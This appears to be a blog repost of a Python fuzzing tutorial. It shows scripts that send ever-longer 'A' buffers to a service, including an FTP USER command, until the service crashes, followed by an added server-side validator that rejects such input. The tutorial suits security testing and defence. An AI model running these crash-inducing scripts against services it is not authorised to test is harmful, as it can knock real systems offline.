[primalsecurity] 0x3 – Fuzzer
0w0 2019. 12. 21. 07:14
Python is an efficient way to carry out fuzzing attacks, which repeatedly connect to a service and feed it varying input values.
Pseudocode

```python
# Import modules: most likely socket and sys; for a web service you might
# import http.client (httplib in Python 2), urllib, etc.
import socket
import sys

# Set up remote IP/Port variables
# Invoke the script: ./script.py <RHOST> <RPORT>
RHOST = sys.argv[1]
RPORT = int(sys.argv[2])

# Define your buffer string that will be incremented until a potential crash
buffer = b'\x41' * 50

# Create a loop that will connect to the service and send the buffer:
while True:
    try:
        # send buffer
        with socket.create_connection((RHOST, RPORT), timeout=2) as s:
            s.sendall(buffer)
        # increment buffer by 50
        buffer = buffer + b'\x41' * 50
    except OSError:
        print("Buffer Length: " + str(len(buffer)))
        print("Can't connect to service...check debugger for potential crash")
        break
```
This pseudocode can be adapted to fuzz many different services.
Fuzzing an FTP server with the USER command

```python
# Import the required modules the script will leverage
# This lets us use the functions in the modules instead of writing the code from scratch
import socket
import sys
from time import sleep

# set first argument given at CLI to 'target' variable
target = sys.argv[1]
# create string of 50 A's '\x41'
buff = b'\x41' * 50

# loop through sending in a buffer with an increasing length by 50 A's
while True:
    # The "try - except" catches the program's error and takes our defined action
    try:
        # Make a connection to target system on TCP/21
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        s.connect((target, 21))
        s.recv(1024)
        print("Sending buffer with length: " + str(len(buff)))
        # Send in string 'USER' + the string 'buff'
        s.send(b"USER " + buff + b"\r\n")
        s.close()
        sleep(1)
        # Increase the buff string by 50 A's and then the loop continues
        buff = buff + b'\x41' * 50
    except OSError:  # If we fail to connect to the server, we assume it has crashed and print the statement below
        print("[+] Crash occurred with buffer length: " + str(len(buff) - 50))
        sys.exit()
```
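The script sends the USER command followed by a run of '\x41' bytes, exhausting the buffer in order to provoke abnormal behaviour.
The buffer should be sent repeatedly, filled with different types of characters.
SPIKE, a more advanced fuzzing tool, sends characters in varying amounts and of varying types in an attempt to bring down the target service.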
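What the receiving side should do with the buffers the script above sends, as an added example that is not part of the original post or the primalsecurity tutorial: a USER-line validator that refuses oversized or malformed input with an FTP error reply, checked against the same growing buffers. The limits `MAX_LINE` and `MAX_USER`, the allowed byte range, and the names `parse_user` and `replay_growing_buffers` are assumptions made for this illustration.

```python
# Added example: server-side validation of an FTP USER line.
MAX_LINE = 512   # assumed cap on a whole command line, in bytes
MAX_USER = 64    # assumed cap on the username argument, in bytes


class Reject(Exception):
    """Raised with an FTP reply code when a command line is refused."""
    def __init__(self, code, text):
        super().__init__(f"{code} {text}")
        self.code = code


def parse_user(line: bytes) -> str:
    """Validate one raw command line and return the username."""
    if len(line) > MAX_LINE:              # check length before any parsing or copying
        raise Reject(500, "Line too long")
    if not line.endswith(b"\r\n"):
        raise Reject(500, "Missing CRLF")
    verb, _, arg = line[:-2].partition(b" ")
    if verb.upper() != b"USER":
        raise Reject(502, "Command not implemented")
    if not 1 <= len(arg) <= MAX_USER:
        raise Reject(501, "Bad username length")
    if any(b < 0x21 or b > 0x7E for b in arg):   # printable, non-space ASCII only
        raise Reject(501, "Illegal byte in username")
    return arg.decode("ascii")


def replay_growing_buffers(fill: bytes, step=50, rounds=20):
    """Feed buffers that grow by `step` copies of `fill`; return (length, outcome) pairs."""
    results = []
    buff = fill * step
    for _ in range(rounds):
        try:
            parse_user(b"USER " + buff + b"\r\n")
            results.append((len(buff), "accepted"))
        except Reject as r:
            results.append((len(buff), r.code))
        buff += fill * step
    return results


if __name__ == "__main__":
    # Constructed fill patterns covering different character types
    for fill in (b"\x41", b"\x00", b"%n", b"\xff"):
        print(fill, replay_growing_buffers(fill)[:3], "...")
```

Every buffer beyond the first 50-byte one is answered with a 501 or 500 reply instead of being copied into storage, so the service stays up for the whole run.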